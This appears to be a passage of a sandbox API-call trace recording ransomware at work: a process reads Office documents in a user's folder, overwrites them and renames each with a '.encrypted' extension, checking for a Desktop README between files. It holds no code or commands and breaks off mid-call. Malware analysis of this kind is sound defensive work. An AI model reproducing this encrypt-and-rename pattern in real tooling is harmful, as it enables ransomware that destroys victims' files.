GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OPMjP99y.xlsx", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OPMjP99y.xlsx", lpFilePart=0x0) returned 0x35 [0152.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.533] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OPMjP99y.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\opmjp99y.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.534] GetFileType (hFile=0x4d0) returned 0x1 [0152.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.534] GetFileType (hFile=0x4d0) returned 0x1 [0152.534] WriteFile (in: hFile=0x4d0, lpBuffer=0x2360298*, nNumberOfBytesToWrite=0x4500, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x2360298*, lpNumberOfBytesWritten=0x2ee884*=0x4500, lpOverlapped=0x0) returned 1 [0152.535] CloseHandle (hObject=0x4d0) returned 1 [0152.536] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OPMjP99y.xlsx", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OPMjP99y.xlsx", lpFilePart=0x0) returned 0x35 [0152.536] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OPMjP99y.xlsx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OPMjP99y.xlsx.encrypted", lpFilePart=0x0) returned 0x3f [0152.536] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.536] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OPMjP99y.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\opmjp99y.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1745ced0, ftCreationTime.dwHighDateTime=0x1d57d0f, ftLastAccessTime.dwLowDateTime=0xea813c30, ftLastAccessTime.dwHighDateTime=0x1d5e5bf, ftLastWriteTime.dwLowDateTime=0x41e26800, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x4500)) returned 1 [0152.536] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.536] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OPMjP99y.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\opmjp99y.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OPMjP99y.xlsx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\opmjp99y.xlsx.encrypted")) returned 1 [0152.537] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qA2 POjX.pptx", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qA2 POjX.pptx", lpFilePart=0x0) returned 0x35 [0152.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.537] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qA2 POjX.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qa2 pojx.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.537] GetFileType (hFile=0x4d0) returned 0x1 [0152.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.537] GetFileType (hFile=0x4d0) returned 0x1 [0152.537] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x704c [0152.537] ReadFile (in: hFile=0x4d0, lpBuffer=0x2364c74, nNumberOfBytesToRead=0x704c, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x2364c74*, lpNumberOfBytesRead=0x2ee894*=0x704c, lpOverlapped=0x0) returned 1 [0152.539] CloseHandle (hObject=0x4d0) returned 1 [0152.553] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.553] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.553] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qA2 POjX.pptx", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qA2 POjX.pptx", lpFilePart=0x0) returned 0x35 [0152.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.553] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qA2 POjX.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qa2 pojx.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.554] GetFileType (hFile=0x4d0) returned 0x1 [0152.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.554] GetFileType (hFile=0x4d0) returned 0x1 [0152.554] WriteFile (in: hFile=0x4d0, lpBuffer=0x23d4bb0*, nNumberOfBytesToWrite=0x7050, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x23d4bb0*, lpNumberOfBytesWritten=0x2ee884*=0x7050, lpOverlapped=0x0) returned 1 [0152.556] CloseHandle (hObject=0x4d0) returned 1 [0152.556] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qA2 POjX.pptx", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qA2 POjX.pptx", lpFilePart=0x0) returned 0x35 [0152.556] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qA2 POjX.pptx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qA2 POjX.pptx.encrypted", lpFilePart=0x0) returned 0x3f [0152.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.557] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qA2 POjX.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qa2 pojx.pptx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f587d40, ftCreationTime.dwHighDateTime=0x1d5d81e, ftLastAccessTime.dwLowDateTime=0x236d0bf0, ftLastAccessTime.dwHighDateTime=0x1d5dac1, ftLastWriteTime.dwLowDateTime=0x41e4c960, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x7050)) returned 1 [0152.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.557] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qA2 POjX.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qa2 pojx.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qA2 POjX.pptx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qa2 pojx.pptx.encrypted")) returned 1 [0152.558] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QnhpLmLhHkmJWB.xlsx", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QnhpLmLhHkmJWB.xlsx", lpFilePart=0x0) returned 0x3b [0152.558] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.558] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QnhpLmLhHkmJWB.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qnhplmlhhkmjwb.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.559] GetFileType (hFile=0x4d0) returned 0x1 [0152.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.559] GetFileType (hFile=0x4d0) returned 0x1 [0152.559] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x1d84 [0152.559] ReadFile (in: hFile=0x4d0, lpBuffer=0x23dc0f4, nNumberOfBytesToRead=0x1d84, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x23dc0f4*, lpNumberOfBytesRead=0x2ee894*=0x1d84, lpOverlapped=0x0) returned 1 [0152.574] CloseHandle (hObject=0x4d0) returned 1 [0152.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.588] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QnhpLmLhHkmJWB.xlsx", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QnhpLmLhHkmJWB.xlsx", lpFilePart=0x0) returned 0x3b [0152.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.588] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QnhpLmLhHkmJWB.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qnhplmlhhkmjwb.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.589] GetFileType (hFile=0x4d0) returned 0x1 [0152.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.589] GetFileType (hFile=0x4d0) returned 0x1 [0152.589] WriteFile (in: hFile=0x4d0, lpBuffer=0x2432270*, nNumberOfBytesToWrite=0x1d90, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x2432270*, lpNumberOfBytesWritten=0x2ee884*=0x1d90, lpOverlapped=0x0) returned 1 [0152.590] CloseHandle (hObject=0x4d0) returned 1 [0152.591] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QnhpLmLhHkmJWB.xlsx", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QnhpLmLhHkmJWB.xlsx", lpFilePart=0x0) returned 0x3b [0152.591] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QnhpLmLhHkmJWB.xlsx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QnhpLmLhHkmJWB.xlsx.encrypted", lpFilePart=0x0) returned 0x45 [0152.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.591] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QnhpLmLhHkmJWB.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qnhplmlhhkmjwb.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a93e8f0, ftCreationTime.dwHighDateTime=0x1d5dfc2, ftLastAccessTime.dwLowDateTime=0x63227650, ftLastAccessTime.dwHighDateTime=0x1d5e0ab, ftLastWriteTime.dwLowDateTime=0x41e98c20, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x1d90)) returned 1 [0152.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.591] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QnhpLmLhHkmJWB.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qnhplmlhhkmjwb.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QnhpLmLhHkmJWB.xlsx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qnhplmlhhkmjwb.xlsx.encrypted")) returned 1 [0152.592] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U6is7p61GHkLJ3_.docx", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U6is7p61GHkLJ3_.docx", lpFilePart=0x0) returned 0x3c [0152.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.593] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U6is7p61GHkLJ3_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\u6is7p61ghklj3_.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.593] GetFileType (hFile=0x4d0) returned 0x1 [0152.593] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.593] GetFileType (hFile=0x4d0) returned 0x1 [0152.593] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0xa216 [0152.593] ReadFile (in: hFile=0x4d0, lpBuffer=0x2434538, nNumberOfBytesToRead=0xa216, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x2434538*, lpNumberOfBytesRead=0x2ee894*=0xa216, lpOverlapped=0x0) returned 1 [0152.595] CloseHandle (hObject=0x4d0) returned 1 [0152.638] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.638] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.638] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U6is7p61GHkLJ3_.docx", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U6is7p61GHkLJ3_.docx", lpFilePart=0x0) returned 0x3c [0152.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.638] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U6is7p61GHkLJ3_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\u6is7p61ghklj3_.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.639] GetFileType (hFile=0x4d0) returned 0x1 [0152.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.639] GetFileType (hFile=0x4d0) returned 0x1 [0152.640] WriteFile (in: hFile=0x4d0, lpBuffer=0x22be354*, nNumberOfBytesToWrite=0xa220, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x22be354*, lpNumberOfBytesWritten=0x2ee884*=0xa220, lpOverlapped=0x0) returned 1 [0152.641] CloseHandle (hObject=0x4d0) returned 1 [0152.642] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U6is7p61GHkLJ3_.docx", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U6is7p61GHkLJ3_.docx", lpFilePart=0x0) returned 0x3c [0152.642] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U6is7p61GHkLJ3_.docx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U6is7p61GHkLJ3_.docx.encrypted", lpFilePart=0x0) returned 0x46 [0152.642] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.642] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U6is7p61GHkLJ3_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\u6is7p61ghklj3_.docx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71e37940, ftCreationTime.dwHighDateTime=0x1d565a5, ftLastAccessTime.dwLowDateTime=0x57392da0, ftLastAccessTime.dwHighDateTime=0x1d5b08d, ftLastWriteTime.dwLowDateTime=0x41f311a0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0xa220)) returned 1 [0152.642] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.642] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U6is7p61GHkLJ3_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\u6is7p61ghklj3_.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\U6is7p61GHkLJ3_.docx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\u6is7p61ghklj3_.docx.encrypted")) returned 1 [0152.643] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vjiQ_cpSzI_lE09.docx", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vjiQ_cpSzI_lE09.docx", lpFilePart=0x0) returned 0x3c [0152.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vjiQ_cpSzI_lE09.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vjiq_cpszi_le09.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.644] GetFileType (hFile=0x4d0) returned 0x1 [0152.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.644] GetFileType (hFile=0x4d0) returned 0x1 [0152.644] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x12921 [0152.644] ReadFile (in: hFile=0x4d0, lpBuffer=0x22c8ac0, nNumberOfBytesToRead=0x12921, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x22c8ac0*, lpNumberOfBytesRead=0x2ee894*=0x12921, lpOverlapped=0x0) returned 1 [0152.646] CloseHandle (hObject=0x4d0) returned 1 [0152.662] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.662] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.662] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vjiQ_cpSzI_lE09.docx", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vjiQ_cpSzI_lE09.docx", lpFilePart=0x0) returned 0x3c [0152.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.662] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vjiQ_cpSzI_lE09.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vjiq_cpszi_le09.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.663] GetFileType (hFile=0x4d0) returned 0x1 [0152.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.664] GetFileType (hFile=0x4d0) returned 0x1 [0152.664] WriteFile (in: hFile=0x4d0, lpBuffer=0x234d570*, nNumberOfBytesToWrite=0x12930, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x234d570*, lpNumberOfBytesWritten=0x2ee884*=0x12930, lpOverlapped=0x0) returned 1 [0152.665] CloseHandle (hObject=0x4d0) returned 1 [0152.667] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vjiQ_cpSzI_lE09.docx", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vjiQ_cpSzI_lE09.docx", lpFilePart=0x0) returned 0x3c [0152.667] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vjiQ_cpSzI_lE09.docx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vjiQ_cpSzI_lE09.docx.encrypted", lpFilePart=0x0) returned 0x46 [0152.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.667] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vjiQ_cpSzI_lE09.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vjiq_cpszi_le09.docx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x630d78c0, ftCreationTime.dwHighDateTime=0x1d59fb2, ftLastAccessTime.dwLowDateTime=0xcc72acf0, ftLastAccessTime.dwHighDateTime=0x1d572a7, ftLastWriteTime.dwLowDateTime=0x41f57300, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x12930)) returned 1 [0152.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.667] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vjiQ_cpSzI_lE09.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vjiq_cpszi_le09.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vjiQ_cpSzI_lE09.docx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vjiq_cpszi_le09.docx.encrypted")) returned 1 [0152.668] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VzbTJtSh2.xlsx", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: 